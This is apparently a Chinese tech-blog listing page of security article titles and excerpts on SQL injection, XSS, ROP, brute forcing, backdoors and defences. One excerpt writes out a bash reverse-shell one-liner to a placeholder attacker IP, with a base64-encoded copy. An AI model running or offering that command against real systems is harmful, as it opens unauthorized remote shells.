ADCS攻击

NPM组件 betsson 等窃取主机敏感信息

【高危】NPM组件betsson等窃取主机敏感信息漏洞描述当用户安装受影响版本的betsson组件包时会窃取用户的主机名、用户名、工作目录、IP地址等信息并发送到攻击者可控的服务器地址。
墨菲安全·2025-07-02 13:46

Web学习:SQL注入之联合查询注入

SQL注入(SQLInjection)是一种常见且危害极大的Web安全漏洞,攻击者可以通过构造恶意的SQL语句窃取、篡改数据库中的数据,甚至控制整个数据库服务器。
kaikaile1995·2025-07-02 13:12

高防CDN:网络安全的“盾牌”与加速利器

尤其是面对日益频繁的DDoS攻击和全球用户对快速访问的需求,高防CDN(高防御内容分发网络)成为企业和开发者的重要选择。本文将用通俗易懂的方式,解析高防CDN的概念及其工作原理。什么是高防CDN?
上海云盾-高防顾问·2025-07-02 11:34

(LeetCode 热题 100) 51.N皇后

目录题目:题目描述:题目链接:思路:核心思路:思路详解:代码:Java代码:题目:题目描述:题目链接:51.N皇后-力扣(LeetCode)思路:核心思路:dfs全排列思路详解:由题规则:皇后可以攻击与之处于同一行或者同一列或同一斜线上的棋子
YuforiaCode·2025-07-02 10:23

Open AI在AI人工智能领域的技术安全防护体系

OpenAI在AI人工智能领域的技术安全防护体系关键词:OpenAI、AI安全、技术防护、伦理框架、模型对齐、数据隐私、对抗攻击摘要:本文将深入探讨OpenAI在人工智能领域构建的多层次技术安全防护体系
AI智能探索者·2025-07-02 09:39

页面弹窗≠有效漏洞:揭秘 XSS 中的沙箱与子域名隔离

前言跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种常见的安全漏洞,攻击者通过将恶意脚本注入到看似安全可靠的网站中,影响其他用户的正常使用。
vortex5·2025-07-02 06:22

Java面试题专项(Redis篇)

这种情况大概率是遭到了攻击。通常都用布隆过滤器(提前用布隆过滤器存储所有存在的key。查询前先查布隆过滤器,不存在的直
嗨,正在熬夜的你·2025-07-02 01:15

信创领域的十大网络安全威胁有哪些

一.人员安全意识不足真实的网络攻击可能并不需要多么高深的技术,更多的是针对人员的安全意识不足发起的攻击。在信创项目建设和运营过程中,涉及大量研发、实施、运维和
极创信息·2025-07-01 21:20

微软服务器安全问题

然而,近年来,我们不得不承认,微软云服务器却频繁出现安全事故,从配置错误引发的数据泄露到DDoS攻击下的防护困境,再到软件更新导致的
国际云1688·2025-07-01 21:48

linux 内核日志等级,Linux系统日志管理

Linux系统中的日志记录了系统每天发生的各种各样的事情,你可以通过它来检查错误发生的原因,或者受到攻击攻击者留下的痕迹。日志对于安全来说,非常重要。
走神儿大神·2025-07-01 19:06

车载以太网-ARP 动态 静态

**常见攻击方式**2.**防护措施****六、总结:如何选择动态或静态ARP?**车载
天赐好车·2025-07-01 17:15

通过HTTPS访问Harbor2.13.1 的配置

在非测试环境中使用HTTP会使您面临中间人攻击。在生产环境中,始终使用HTTPS。要
云游·2025-07-01 17:45

8 [GitHub开源项目被投毒后门病毒跟随开发流程传播蔓延]

近年来,一种隐蔽又危险的攻击手段——代码投毒,悄悄成了威胁开发者和用户安全的隐患。
学编程的闹钟·2025-07-01 13:54

【代码审计】安全审核常见漏洞修复策略

含格式/扩展名校验)3.SQL注入漏洞(MyBatis${})示例修复建议4.生成组件间接依赖生成依赖树建议5.间接依赖组件的漏洞什么是间接依赖后端修复1后端修复2前端修复1前端修复26.XSS(跨站脚本攻击
秋说·2025-07-01 12:11

2025年全球数据安全发展趋势

然而,数据泄露、网络攻击等安全事件频发,给个人隐私、企业利益乃至国家安全带来了前所未有的挑战。
jinan886·2025-07-01 11:37

二次开发源码 借贷系统uniapp/借贷认证系统/小额信贷系统/工薪贷APP/资金贷系统h5

前端使用的uniapp可以打包APPH5小程序系统提供了完善的网络借贷体系,为金融中介平台提供从获客到贷后管理全流程服务,解决了借贷手续繁琐、流程缓慢等问题此源码为运营中版本,具有极高稳定性,防注入,防攻击
csdndddsd·2025-07-01 05:32

【ARM 芯片 安全与攻击 5.7 -- 码重用攻击

文章目录什么是代码重用攻击?ROP攻击示例示例背景攻击步骤假设的ROP链构建输入数据使用payload进行攻击防御措施Summary什么是代码重用攻击
主公讲 ARM·2025-07-01 03:52

ROP和Ret2libc漏洞

一、ROP攻击原理ROP全称为Return-orientedProgramming(返回导向式编程)是一种新型的基于代码复用技术的攻击攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。
卍king卐然·2025-07-01 03:51

筑牢网络安全屏障

同时,关键信息基础设施如能源、交通、通信系统,一旦遭受网络攻击瘫痪,将直接威胁国家经济命脉
qq_43090857·2025-07-01 03:51

黑客入门 | 用ROP和shellcode攻击SolarWinds Serv-U SSH漏洞

(备注:黑客Hacker并不等同于信息安全罪犯。)最近花了些时间学习bufferoverflow安全漏洞,做了大名鼎鼎的CSAPP课程里的attacklab,学到了return-orientedprogramming(ROP)这种让我大开眼界的进攻方式。于是想要趁热打铁,来详细研究一下现实世界中的黑客进攻案例。本篇文章挑选的是2021年SolarWindsServ-UFTP软件中的漏洞,记录编号C
廖致君·2025-07-01 03:50

十八、windows系统安全---利用Hydra获得账号密码

环境靶机:windowsserver2012攻击机:kalilinux靶机环境密码为弱口令设定登录失败的次数锁定用户账号,关闭密码复杂度步骤1.在kali上探测目标主机(可在目标主机通过ipconfig
midsummer_woo·2025-07-01 03:18

Windows 权限维持-后门隐藏

交流使用,请勿做非法用途攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现隐藏文件1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性
蟹老板6·2025-07-01 03:18

各种shell反弹方法

1.利用bash进行反弹shell先使用nc进行监听nc-lvvpport端口号再在目标机器执行bash-i>&/dev/tcp/攻击ip/端口0>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx
!QK·2025-07-01 01:37

python反弹shell

反弹shell是一种通过远程连接获取受害者计算机的shell权限的攻击技术。使用Python反弹shell的方法如下:首先,在本地计算机上运行一个监听程序,等待连接。
46497976464·2025-07-01 01:07

AMD机密计算虚拟机介绍

什么机密计算虚拟机机密计算虚拟机是一种基于硬件安全技术(如AMDSecureEncryptedVirtualization,SEV)的虚拟化环境,旨在保护虚拟机(VM)的运行中数据(包括内存、CPU寄存器等)免受外部攻击或未经授权的访问
李天琦·2025-06-30 21:39

信息安全与网络安全---引言

仅供参考文章目录一、计算机安全1.1CIA三元组1.2影响等级1.3计算机安全的挑战二、OSI安全体系结构2.1安全攻击2.2安全服务2.3安全机制三、基本安全设计准则四、攻击面和攻击树(重点)4.1攻击
薄荷椰果抹茶·2025-06-30 18:50

【Go语言成长之路】 模糊测试

可以通过模糊测试发现的漏洞示例包括SQL注入、缓冲区溢出、拒绝服务和跨站点脚本攻击。注:Go语言中模糊测试已经内置,具体可以参考:GoFuzzingdocs,将来还会添加更多功能。一、前提Go1
风华同学·2025-06-30 18:18

什么是护网行动

公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。
鹿鸣天涯·2025-06-30 18:18

Python爬虫实战:研究MarkupSafe库相关技术

然而,直接渲染爬取的网页内容存在安全隐患,特别是跨站脚本攻击(XSS)风险。攻击者可能通过注入恶意脚本窃取用户信息或破坏网站功能。
ylfhpy·2025-06-30 12:37

Python爬虫实战:研究sanitize库相关技术

其中,跨站脚本攻击(XSS)
ylfhpy·2025-06-30 12:36

零信任架构——重构企业安全边界的新范式

当数据散布于公有云、边缘设备与SaaS平台,当供应链攻击可穿透层层防护,“内部可信”的假设已成为最大安全漏洞。
月_o9·2025-06-30 12:34

网络安全防御:蓝队重保备战与应急溯源深度解析

学员将能够熟练运用各种工具和技术,有效应对网络攻击,保障企业信息安全。具体目标如下:增强综合攻防能力:通过综合训练,学员将能够模拟攻击者和企业安全人员,开展对抗练习,提升实战能力和团队协作能力。
网安认证小马135-2173-0416·2025-06-30 05:25

蓝队溯源反制一键利用工具

蓝队利器、溯源反制、NPS漏洞利用、NPSexp、NPSpoc、Burp插件、一键利用最近做攻防演练发现了很多内网穿透的工具,其中最多的就是nps,红队老哥好像还挺喜欢这个的,真的是多,每天导出攻击IP
网络安全进阶·2025-06-30 05:55

微信支付回调验证实战:构建防伪造请求的3道防火墙

⚡痛点场景当你的电商系统遭遇:黑客伪造支付成功回调→0元订单自动发货重放攻击→单笔交易多次发货中间人篡改金额→1999元订单变成1.99元微信官方数据:未验签的回调接口被攻击概率高达73%安全架构三重防护
IT莫染·2025-06-29 23:19

第5篇:Gin的数据验证与绑定——确保请求数据合法性

用户提交的表单数据格式混乱导致系统崩溃,恶意请求携带非法参数攻击API接口,或者因为数据校验不完善而引发的各种业务异常?这些问题的根源往往在于——我们没有在数据进入业务逻辑之前就建立起坚固的防线。
GO兔·2025-06-29 19:50

区块链知识总结——POS权益证明

pos天然防范了51%攻击解释:pow之下,attacker可以在现实世界中购买矿机,来增加算力以达到51%attack目的,而pos下attacker必须购买更多的加密货币(相当于成为股东),才有发动
The_Killer.·2025-06-29 17:36

【区块链】区块链交易(Transaction)之nonce

以太坊使用nonce来防止双重支付(doublespending)和重放攻击(replayattacks)。从0开始,每次交易都会增加1。交易必须按nonce顺序被区块链确认,否则会被拒绝。
ZFJ_张福杰·2025-06-29 17:36

MySQL与SQL Server的差异及测试手法

本文将深入探讨这两种数据库在SQL注入场景下的差异,以及SQLServer如何利用SQL注入写入Webshell,并介绍其他常见的SQL注入攻击手法。
ke0hly·2025-06-29 16:30

保护生产中 Node.js 应用程序安全的 15 项最佳实践

攻击者可能会利用弱
梦玄海·2025-06-29 16:27

第27篇:SELinux安全增强机制深度解析与OpenEuler实践指南

传统的自主访问控制(DAC)以文件所有者权限为核心,如Linux中的UID/GID权限体系,允许所有者自由分配权限,但这种机制在面对多用户复杂环境时存在安全隐患——一旦用户账户被入侵,攻击者可
·2025-06-29 16:56

车联网网络安全渗透测试:深度解析与实践

从车载系统到云端平台,从车内通信到V2X通信,车联网的每一个环节都可能成为潜在的攻击面,一旦被恶意利用,将直接威胁到驾乘人员的生命财产安全,甚至影响国家安全和公共秩序。
ke0hly·2025-06-29 16:26

Python爬虫实战:研究Bleach库相关技术

然而,从互联网获取的内容往往包含恶意脚本、不安全标签等安全隐患,直接使用可能导致XSS(跨站脚本攻击)、数据泄露等风险。
ylfhpy·2025-06-29 15:49

基于YOLOv5的监控摄像头遮挡检测系统:从数据集到UI界面的完整实现

实时守护监控设备安全,智能识别遮挡攻击的AI解决方案一、问题背景与系统价值在安防监控领域,摄像头遮挡是常见的恶意攻击手段——统计显示35%的安防失效源于摄像头被遮挡。
芯作者·2025-06-29 12:58

什么是DNS缓存投毒?有哪些防御措施?

然而,这座灯塔却面临着被恶意篡改的风险,DNS缓存投毒便是其中一种极具危害性的攻击手段。什么是DNS缓存投毒?
·2025-06-29 08:01

智能汽车数据堡垒:HSM固件签名如何阻断车载系统0day漏洞?

车载系统漏洞攻防数据(2024)攻击类型占比技术手段典型后果OTA固件劫持42%仿冒升级包注入后门远程操控刹车/转向系统ECU恶意刷写31%通过OBD-II接口刷入破坏性固件动力电池过充起火车云
安 当 加 密·2025-06-29 08:30

《网络攻防技术》《数据分析与挖掘》《网络体系结构与安全防护》这三个研究领域就业如何?

数字化转型深入、网络攻击日益频繁和复杂(勒索软件、APT攻击、供应链攻击等)、数据安全与隐私保护法规(如GDPR、中
扣棣编程·2025-06-29 05:39

Solidity学习 - 代理模式中的初始化漏洞

文章目录前言一、原理剖析(一)代理模式基础(二)初始化流程概述(三)初始化漏洞成因二、案例分析(一)某DeFi借贷平台攻击事件(二)某NFT市场平台漏洞事件三、解决办法(一)严格权限控制(二)防止重入机制前言在
本郡主是喵·2025-06-29 05:39

高防IP在服务器中的作用都有哪些?

高防IP作为一种通过技术手段让用户网络服务更加安全的一种IP地址,有着更高的防御能力,有着强大的流量清洗中心和防御系统,帮助企业实时监控网络流量,将恶意的用户请求识别并过滤掉,保护目标服务器不会受到网络攻击
wanhengidc·2025-06-28 22:16

对于服务器企业该如何进行搭建?

搭建服务器要确保其安全性与稳定性,所以需要安全防火墙等保护措施,对进入服务器网络流量进行过滤和监控,防止一些恶意的网络攻击,并且对其进行定期更新操作系统和应用程序的补丁,及时修复潜在的安全漏洞,避
wanhengidc·2025-06-28 22:15

【安全漏洞】深入剖析CVE-2021-40444-Cabless利用链

背景CVE-2021-40444为微软MHTML远程命令执行漏洞,攻击者可通过传播MicrosoftOffice文档,诱导目标点击文档从而在目标机器上执行任意代码。
IT老涵·2025-06-28 22:44
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他